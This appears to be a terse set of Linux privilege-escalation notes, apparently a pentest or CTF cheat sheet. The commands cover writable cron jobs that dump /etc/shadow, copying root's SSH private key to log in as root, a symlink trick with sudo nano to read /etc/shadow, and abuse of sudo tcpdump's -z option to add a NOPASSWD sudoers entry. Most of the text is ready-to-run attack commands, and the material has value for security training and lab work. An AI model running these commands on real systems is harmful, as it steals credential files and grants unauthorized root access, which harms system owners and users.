Exploitation depends on functionality of SUID. Reading files or writing files leads to grabbing SSH / shadow files.
Cron
# Find bad privs
find /etc/cron* -type f -perm -o+w -exec ls -l {} \;
# Look at when it will run and who as
cat /etc/crontab
# Get it to write to shadow file
echo -e '#!/bin/bash\n/bin/cat /etc/shadow > /tmp/shadow' > /etc/cron.hourly/oddjob
Readable SSH
# Check listing root
ls -la /root
# Check listing ssh
ls -la /root/.ssh
# Read file (worth trying even if you cant list contents of .ssh
cat /root/.ssh/id_rsa
# Make SSH dir
mkdir /home/<user>/.ssh
# Copy SSH into it
cp /root/.ssh/id_rsa /home/<user>/.ssh
# Change Perms
chmod o-rwx /home/<user>/.ssh/id_rsa
# SSH
ssh -i /home/<user>/.ssh/id_rsa root@localhost
Symlink
# Check sudo rights
sudo -l
# If you have sudo rights for something like nano on a specific file
# Create symlink to link that file to shadow and then read it
# File in example is readme.txt
ln -s /etc/shadow readme.txt
# Link to proper terminal
export TERM=xterm
#Read file
sudo nano readme.txt
TCPDump
# If tcpdump is in sudo list then we can abuse
# Create a file /tmp/elevate
#!/bin/bash
echo “james ALL=(root) NOPASSWD: ALL” >> /etc/sudoers
chmod +x /tmp/elevate
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/elevate -Z root
sudo bash